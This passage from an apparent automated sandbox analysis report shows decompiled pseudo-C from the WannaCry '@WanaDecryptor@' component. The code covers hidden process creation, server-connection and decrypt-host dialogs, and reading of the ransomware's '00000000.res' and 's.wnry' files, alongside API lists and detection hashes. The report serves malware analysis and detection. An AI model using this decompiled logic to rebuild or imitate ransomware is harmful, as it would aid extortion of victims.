                                  					E0040DC00( &_v40);
                                  					_t68 =  *0x422210; // 0xb24228
                                  					_push(0);
                                  					_push(E0040DD40( &_v48));
                                  					_push(E0040DD30( &_v48));
                                  					_push(7);
                                  					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
                                  						if(_t138 != 0) {
                                  							SendMessageA(_t138, 0x4e21, 0, 0);
                                  						}
                                  						_t113 =  *0x422210; // 0xb24228
                                  						_push( &_v64);
                                  						_push( &_a4060);
                                  						_v64 = 0x13ec;
                                  						_push( &_v65);
                                  						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
                                  							if(_v77 == 7) {
                                  								_t141 = 0;
                                  								if(_v76 > 0) {
                                  									_t136 = fopen(_a9200, "wb");
                                  									_t144 = _t144 + 8;
                                  									if(_t136 != 0) {
                                  										fwrite( &_a4048, 1, _v76, _t136);
                                  										fclose(_t136);
                                  										_t144 = _t144 + 0x14;
                                  										_t141 = 1;
                                  									}
                                  								}
                                  							}
                                  							if(_t138 != 0) {
                                  								SendMessageA(_t138, 0x4e22, _t141, 0);
                                  							}
                                  							_t114 =  *0x422210; // 0xb24228
                                  							 *((intOrPtr*)( *_t114 + 0xc))();
                                  							_a9156 = 0xffffffff;
                                  							L23:
                                  							E0040DBF0( &_v68);
                                  							_t76 = _t141;
                                  						} else {
                                  							if(_t138 != 0) {
                                  								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
                                  							}
                                  							_t118 =  *0x422210; // 0xb24228
                                  							 *((intOrPtr*)( *_t118 + 0xc))();
                                  							_a9156 = 0xffffffff;
                                  							_t76 = E0040DBF0( &_v68) | 0xffffffff;
                                  						}
                                  						goto L24;
                                  					} else {
                                  						if(_t138 != 0) {
                                  							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
                                  						}
                                  						_t120 =  *0x422210; // 0xb24228
                                  						 *((intOrPtr*)( *_t120 + 0xc))();
                                  						_a9168 = 0xffffffff;
                                  						_t76 = E0040DBF0( &_v56) | 0xffffffff;
                                  						L24:
                                  						 *[fs:0x0] = _a9148;
                                  						return _t76;
                                  					}
                                  				}
                                  				_t92 = _a9272;
                                  				if(_t92 != 0) {
                                  					SendMessageA(_t92, 0x4e20, _t141, 0);
                                  				}
                                  				_a9224 = _t141;
                                  				goto L23;
                                  			}

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                  • fopen.MSVCRT ref: 0040C46B
                                  • fwrite.MSVCRT ref: 0040C489
                                  • fclose.MSVCRT ref: 0040C48F
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823fclosefopenfwrite
                                  • String ID:
                                  • API String ID: 1132507536-0
                                  • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                  • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
                                  				struct _STARTUPINFOA _v68;
                                  				struct _PROCESS_INFORMATION _v84;
                                  				void* _t21;
                                  				long _t25;
                                  				DWORD* _t30;
                                  
                                  				_v68.cb = 0x44;
                                  				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
                                  				_v84.hThread = _t21;
                                  				_v84.dwProcessId = _t21;
                                  				_v84.dwThreadId = _t21;
                                  				_v84.hProcess = 0;
                                  				_v68.dwFlags = 1;
                                  				_v68.wShowWindow = 0;
                                  				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
                                  					return 0;
                                  				} else {
                                  					_t25 = _a8;
                                  					if(_t25 != 0) {
                                  						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
                                  							TerminateProcess(_v84.hProcess, 0xffffffff);
                                  						}
                                  						_t30 = _a12;
                                  						if(_t30 != 0) {
                                  							GetExitCodeProcess(_v84.hProcess, _t30);
                                  						}
                                  					}
                                  					CloseHandle(_v84);
                                  					CloseHandle(_v84.hThread);
                                  					return 1;
                                  				}
                                  			}









                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                  • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                  • String ID: D
                                  • API String ID: 786732093-2746444292
                                  • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                  • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00401140() {
                                  				intOrPtr _v4;
                                  				void* _t17;
                                  				struct HWND__* _t18;
                                  				void* _t23;
                                  				intOrPtr _t24;
                                  
                                  				_t23 = _t17;
                                  				L00412CB0();
                                  				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
                                  				_t18 =  *(_t23 + 0x80);
                                  				SendMessageA(_t18, 0x401, 0, 0x280000);
                                  				_push(_t18);
                                  				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
                                  				_v4 = _t24;
                                  				L00412CAA();
                                  				E00401970("Connecting to server...");
                                  				 *(_t23 + 0xa8) = 0;
                                  				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
                                  				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
                                  					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
                                  				}
                                  				return 1;
                                  			}









                                  APIs
                                  • #4710.MFC42 ref: 00401145
                                  • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                  • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                  • #537.MFC42(Connecting to server...), ref: 0040118D
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                  • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                  Strings
                                  • Connecting to server..., xrefs: 00401188
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                  • String ID: Connecting to server...
                                  • API String ID: 3305248171-1849848738
                                  • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                  • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                  • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E00407F80(void* __ecx) {
                                  				struct _IO_FILE* _t24;
                                  				void* _t30;
                                  				void* _t37;
                                  				void* _t38;
                                  				signed int _t45;
                                  				signed int _t48;
                                  				signed int _t51;
                                  				unsigned int _t53;
                                  				signed int _t54;
                                  				void* _t66;
                                  				struct _IO_FILE* _t76;
                                  				void* _t77;
                                  				void* _t78;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t84;
                                  				void* _t85;
                                  
                                  				_t79 = __ecx;
                                  				 *((char*)(_t81 + 0xc)) = 0;
                                  				memset(_t81 + 0xd, 0, 0xc << 2);
                                  				_t82 = _t81 + 0xc;
                                  				asm("stosb");
                                  				 *((intOrPtr*)(_t82 + 0x40)) = 0;
                                  				memset(_t82 + 0x44, 0, 0x21 << 2);
                                  				_t24 = fopen("00000000.res", "rb");
                                  				_t76 = _t24;
                                  				_t84 = _t82 + 0x14;
                                  				_t89 = _t76;
                                  				if(_t76 != 0) {
                                  					fread(_t84 + 0x48, 0x88, 1, _t76);
                                  					fclose(_t76);
                                  					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
                                  					_t45 = _t84 + 0x60;
                                  					_push(_t84 + 0x2c);
                                  					_t66 = _t79 + 0x5f0;
                                  					_push("+++");
                                  					_push(_t45);
                                  					_push(_t66);
                                  					_t30 = E0040C4F0(_t38, _t45, _t89);
                                  					_t85 = _t84 + 0x30;
                                  					_t77 = _t30;
                                  					E0040C670();
                                  					_t90 = _t77 - 0xffffffff;
                                  					if(_t77 == 0xffffffff) {
                                  						_push(_t85 + 0xc);
                                  						_push("+++");
                                  						_push(_t85 + 0x40);
                                  						_push(_t66);
                                  						_t37 = E0040C4F0(_t38, _t45, _t90);
                                  						_t85 = _t85 + 0x10;
                                  						_t77 = _t37;
                                  					}
                                  					_t24 = E0040C670();
                                  					if(_t77 == 1) {
                                  						_t24 = 0;
                                  						asm("repne scasb");
                                  						_t48 =  !(_t45 | 0xffffffff) - 1;
                                  						if(_t48 >= 0x1e) {
                                  							asm("repne scasb");
                                  							_t51 =  !(_t48 | 0xffffffff) - 1;
                                  							if(_t51 < 0x32) {
                                  								asm("repne scasb");
                                  								_t53 =  !(_t51 | 0xffffffff);
                                  								_t78 = _t85 + 0xc - _t53;
                                  								_t54 = _t53 >> 2;
                                  								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
                                  								return E00401A10(_t79 + 0x50c, 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t24;
                                  			}






















                                  APIs
                                  • fopen.MSVCRT ref: 00407FBD
                                  • fread.MSVCRT ref: 00407FDD
                                  • fclose.MSVCRT ref: 00407FE4
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                    • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy$fclosefopenfread
                                  • String ID: +++$00000000.res$s.wnry
                                  • API String ID: 3363958884-869915597
                                  • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                  • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401220(void* __ecx, long _a4) {
                                  				long _t11;
                                  				void* _t26;
                                  
                                  				_t11 = _a4;
                                  				_t26 = __ecx;
                                  				if(_t11 != 0x3e9) {
                                  					L8:
                                  					L00412CBC();
                                  					return _t11;
                                  				}
                                  				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
                                  					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
                                  					KillTimer( *(_t26 + 0x20), 0x3e9);
                                  					L00412B66();
                                  				}
                                  				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
                                  					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
                                  				}
                                  				_t11 =  *(_t26 + 0xa0);
                                  				if(_t11 == 0) {
                                  					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
                                  					if(_t11 == 0xf) {
                                  						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
                                  					}
                                  				}
                                  				goto L8;
                                  			}






                                  APIs
                                  • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                  • KillTimer.USER32(?,000003E9), ref: 0040125E
                                  • #4853.MFC42 ref: 00401266
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                  • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                  • #2379.MFC42 ref: 004012C4
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#2379#4853KillTimer
                                  • String ID:
                                  • API String ID: 178170520-0
                                  • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                  • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00403860(void* __ecx) {
                                  				int _t6;
                                  				long _t7;
                                  				void* _t9;
                                  				void* _t14;
                                  
                                  				_t14 = __ecx;
                                  				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
                                  				_push(0);
                                  				if(_t6 != 0xffffffff) {
                                  					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
                                  					if(_t7 != 0) {
                                  						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
                                  						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
                                  						 *(_t14 + 0xf4) = _t9;
                                  						return _t9;
                                  					}
                                  					return _t7;
                                  				} else {
                                  					_push(0);
                                  					_push("Please select a host to decrypt.");
                                  					L00412CC8();
                                  					return _t6;
                                  				}
                                  			}








                                  APIs
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                  • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                  • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                  Strings
                                  • Please select a host to decrypt., xrefs: 00403885
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1200CreateThread
                                  • String ID: Please select a host to decrypt.
                                  • API String ID: 3616405048-3459725315
                                  • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                  • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E004044C0(void* __ecx, long _a4) {
                                  				struct tagLOGFONTA _v72;
                                  				long _t10;
                                  				struct HFONT__* _t13;
                                  				struct HWND__* _t15;
                                  				void* _t21;
                                  
                                  				_t10 = _a4;
                                  				_t21 = __ecx;
                                  				if(_t10 != 0) {
                                  					L2:
                                  					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
                                  					_v72.lfUnderline = 1;
                                  					_t13 = CreateFontIndirectA( &_v72);
                                  					_push(_t13);
                                  					L00412D5E();
                                  					 *((char*)(_t21 + 0x58)) = 1;
                                  					return _t13;
                                  				}
                                  				_t15 = GetParent( *(__ecx + 0x20));
                                  				_push(_t15);
                                  				L00412DAC();
                                  				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
                                  				_push(_t10);
                                  				L00412DE2();
                                  				if(_t10 != 0) {
                                  					goto L2;
                                  				}
                                  				return _t10;
                                  			}









                                  APIs
                                  • GetParent.USER32(?), ref: 004044D2
                                  • #2864.MFC42(00000000), ref: 004044D9
                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                  • #2860.MFC42(00000000), ref: 004044EF
                                  • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                  • CreateFontIndirectA.GDI32(?), ref: 00404513
                                  • #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 2724197214-0
                                  • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                  • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0040C060(void* __ecx, void* __eflags) {
                                  				void* _t35;
                                  				int _t45;
                                  				struct HWND__* _t56;
                                  				signed int _t58;
                                  				int _t59;
                                  				intOrPtr* _t65;
                                  				intOrPtr* _t69;
                                  				intOrPtr* _t70;
                                  				intOrPtr* _t73;
                                  				intOrPtr* _t75;
                                  				struct HWND__* _t87;
                                  				intOrPtr _t92;
                                  				void* _t93;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004142BB);
                                  				 *[fs:0x0] = _t92;
                                  				E00413060(0x2408, __ecx,  *[fs:0x0]);
                                  				_push(_t58);
                                  				E0040DBB0(_t92 + 0x18, 0x1000);
                                  				 *(_t92 + 0x241c) = 0;
                                  				_push(_t92 + 0x14);
                                  				_t59 = _t58 | 0xffffffff;
                                  				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
                                  				_t93 = _t92 + 0x10;
                                  				if(_t35 == 0) {
                                  					_t87 =  *(_t93 + 0x2430);
                                  					if(_t87 != 0) {
                                  						SendMessageA(_t87, 0x4e20, 0, 0);
                                  					}
                                  					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
                                  					_t65 =  *0x422210; // 0xb24228
                                  					_push(0);
                                  					_push(E0040DD40(_t93 + 0x1c));
                                  					_push(E0040DD30(_t93 + 0x20));
                                  					_push(7);
                                  					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
                                  						if(_t87 != 0) {
                                  							SendMessageA(_t87, 0x4e21, 0, 0);
                                  						}
                                  						_t69 =  *0x422210; // 0xb24228
                                  						_push(_t93 + 0x10);
                                  						_push(_t93 + 0x102c);
                                  						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
                                  						_push(_t93 + 0x17);
                                  						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
                                  							if( *((char*)(_t93 + 0xf)) == 7) {
                                  								_t59 = 0;
                                  							}
                                  							if(_t87 != 0) {
                                  								SendMessageA(_t87, 0x4e22, _t59, 0);
                                  							}
                                  							_t70 =  *0x422210; // 0xb24228
                                  							 *((intOrPtr*)( *_t70 + 0xc))();
                                  							 *(_t93 + 0x241c) = 0xffffffff;
                                  							goto L21;
                                  						} else {
                                  							if(_t87 != 0) {
                                  								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
                                  							}
                                  							_t73 =  *0x422210; // 0xb24228
                                  							 *((intOrPtr*)( *_t73 + 0xc))();
                                  							 *(_t93 + 0x241c) = 0xffffffff;
